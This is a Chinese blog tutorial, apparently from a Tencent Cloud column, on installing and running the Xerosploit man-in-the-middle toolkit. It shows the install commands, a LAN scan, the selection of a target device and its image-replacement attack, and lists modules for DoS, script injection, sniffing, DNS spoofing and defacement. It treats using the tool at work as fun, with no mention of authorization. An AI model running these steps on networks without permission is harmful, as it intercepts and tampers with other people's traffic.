中间人攻击工具(Xerosploit)

简介

Xerosploit是一个渗透测试工具包,它的目的是实现中间人攻击。它附带着各种有效的攻击模块,并且还允许执行拒绝服务攻击和端口扫描

安装

  • 下载 git clone https://github.com/LionSec/xerosploit.git
  • 安装 cd xerosploit && sudo python install.py
root@7c81645eb6d8:~# cd xerosploit && sudo python install.py
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘     
[++] Please choose your operating system.
1) Ubuntu / Kali linux / Others
2) Parrot OS
>>> 1

输入对应的系统就可以自动安装了 Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal. 显示这个表示安装成功

使用

输入 xerosploit 打开工具

██╗  ██╗███████╗██████╗  ██████╗ ███████╗██████╗ ██╗      ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
 ╚███╔╝ █████╗  ██████╔╝██║   ██║███████╗██████╔╝██║     ██║   ██║██║   ██║   
 ██╔██╗ ██╔══╝  ██╔══██╗██║   ██║╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║   
██╔╝ ██╗███████╗██║  ██║╚██████╔╝███████║██║     ███████╗╚██████╔╝██║   ██║   
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝                                                      


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]
 
┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     
 
╒══════════════╤═══════════════════╤═══════════╤═════════╤════════════╕
│  IP Address  │    MAC Address    │  Gateway  │  Iface  │  Hostname  │
╞══════════════╪═══════════════════╪═══════════╪═════════╪════════════╡
│              │                   │           │         │            │
├──────────────┼───────────────────┼───────────┼─────────┼────────────┤
│   1.1.1.11   │ 08:00:27:7B:3D:E7 │  1.1.1.1  │  eth0   │    kali    │
╘══════════════╧═══════════════════╧═══════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ 

如果你要实现中间人攻击,比如你要让受害者访问的网站的图片全部变为固定的一张照片,你可以这样做 输入help查看下菜单选项

Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan     :  Map your network.                                  ║
║          ║                                                                ║
║          ║ iface    :  Manually set your network interface.               ║
║ COMMANDS ║                                                                ║
║          ║ gateway  :  Manually set your gateway.                         ║
║          ║                                                                ║
║          ║ start    :  Skip scan and directly set your target IP address. ║
║          ║                                                                ║
║          ║ rmlog    :  Delete all xerosploit logs.                        ║
║          ║                                                                ║
║          ║ help     :  Display this help message.                         ║
║          ║                                                                ║
║          ║ exit     :  Close Xerosploit.                                  ║
║          ║                                                                ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ 

输入scan扫描一下网络

Xero ➮ scan

[++] Mapping your network ... 

[+]═══════════[ Devices found on your network ]═══════════[+]

╔════════════╦═══════════════════╦══════════════════════════════╗
║ IP Address ║ Mac Address       ║ Manufacturer                 ║
╠════════════╬═══════════════════╬══════════════════════════════╣
║ 1.1.1.1    ║ B8:F8:83:76:7E:E5 ║ (Tp-link Technologies)       ║
║ 1.1.1.2    ║ A0:8C:FD:D1:2C:C6 ║ (Hewlett Packard)            ║
║ 1.1.1.3    ║ A0:8C:FD:D2:25:B8 ║ (Hewlett Packard)            ║
║ 1.1.1.5    ║ C0:CC:F8:42:DD:D5 ║ (Apple)                      ║
║ 1.1.1.6    ║ A0:8C:FD:D1:E1:8E ║ (Hewlett Packard)            ║
║ 1.1.1.7    ║ A0:8C:FD:D5:81:DD ║ (Hewlett Packard)            ║
║ 1.1.1.9    ║ C8:6F:1D:22:37:A2 ║ (Apple)                      ║
║ 1.1.1.10   ║ 08:00:37:A1:64:05 ║ (Fuji-xerox)                 ║
║ 1.1.1.12   ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology) ║
║ 1.1.1.14   ║ B0:E2:35:43:62:43 ║ (Xiaomi Communications)      ║
║ 1.1.1.11   ║ 08:00:27:7B:3D:E7 ║ (This device)                ║
║ 1.1.1.254  ║                   ║                              ║
║            ║                   ║                              ║
╚════════════╩═══════════════════╩══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 

扫描的信息很详细,连一些基础的设备信息都扫描出来了 接下来输入各种信息,看下面就好

Xero ➮ 1.1.1.12

[++] 1.1.1.12 has been targeted. 

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ help

╔═════════╦══════════════════════════════════════════════════════════════════════╗
║         ║                                                                      ║
║         ║ pscan       :  Port Scanner                                          ║
║         ║                                                                      ║
║         ║ dos         :  DoS Attack                                            ║
║         ║                                                                      ║
║         ║ ping        :  Ping Request                                          ║
║         ║                                                                      ║
║         ║ injecthtml  :  Inject Html code                                      ║
║         ║                                                                      ║
║         ║ injectjs    :  Inject Javascript code                                ║
║         ║                                                                      ║
║         ║ rdownload   :  Replace files being downloaded                        ║
║         ║                                                                      ║
║         ║ sniff       :  Capturing information inside network packets          ║
║ MODULES ║                                                                      ║
║         ║ dspoof      :  Redirect all the http traffic to the specified one IP ║
║         ║                                                                      ║
║         ║ yplay       :  Play background sound in target browser               ║
║         ║                                                                      ║
║         ║ replace     :  Replace all web pages images with your own one        ║
║         ║                                                                      ║
║         ║ driftnet    :  View all images requested by your targets             ║
║         ║                                                                      ║
║         ║ move        :  Shaking Web Browser content                           ║
║         ║                                                                      ║
║         ║ deface      :  Overwrite all web pages with your HTML code           ║
║         ║                                                                      ║
╚═════════╩══════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ replace
 
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘     

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮ /root/a.png

[++] All images will be replaced by /root/a.png

[++] Press 'Ctrl + C' to stop . 

效果类似下面这样

评价

在公司里还是挺好玩的,好评,各种中间人攻击的东西几乎都有

Having Fun

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏腾讯云TStack专栏

内存虚拟化到底是咋整的?

6320
来自专栏转载gongluck的CSDN博客

FFmpeg菜鸡互啄#第2篇#配置VS开发环境

下载FFmpeg 首先是下载FFmpeg的win32库,我用的版本是2.5.2(和其他2.x.x版本应该不会有太大差别)。FFmpeg的官网上好像已经找不到旧版...

4306
来自专栏大魏分享(微信公众号:david-share)

隆重介绍!CI/CD手下的开源界六大金刚

Jenkins 2 image based on Red Hat Enterprise Linux的镜像

4023
来自专栏康怀帅的专栏

Docker Compose version 3 使用详解

Define application stacks built using multiple containers, services, and swarm c...

5.5K6
来自专栏游戏杂谈

Flash Pro CS5无法跳过注册Adobe ID的问题

装了N多次卸载了N多次,就是没有上图中的那个“跳过此步骤”,找了N个注册码还是不行。按网上的说明,有两种方式可以解决这个问题:

1762
来自专栏Linux运维学习之路

Docker集群编排工具之Kubernetes(K8s)介绍、安装及使用

K8s基础原理 k8s中文社区:https://www.kubernetes.org.cn/ 简介 Kubernetes与较早的集群管理系统Mesos和YARN...

1.7K5
来自专栏KaliArch

Linux系统检查脚本

对登录一个系统,快速查看其系统信息,检查系统各项指标及参数,编写系统快速检查脚本,输出系统信息到脚本运行的logs目录下。

1244
来自专栏我的小碗汤

Kubernetes-dashboard的身份认证

我们成功配置安装了kubernetes-dashboard插件,但是这里似乎来了另外一个问题:我们怎样进入到dashboard?

6642
来自专栏小狼的世界

Kubernetes基础:查看状态、管理服务

在Kubernetes中创建一个Deployment 部署就会在Node上创建一个Pod,Pod是Kubernetes中对于一组容器以及与容器相关的资源的集合。...

3791
来自专栏Rainbond开源「容器云平台」

IT苦工指南 | Kubernetes v1.8.x全手动安装

觉得Rainbond提供的既简洁、又易用、而且生产就绪的Kubernets体验不过瘾……

2805

扫码关注云+社区

领取腾讯云代金券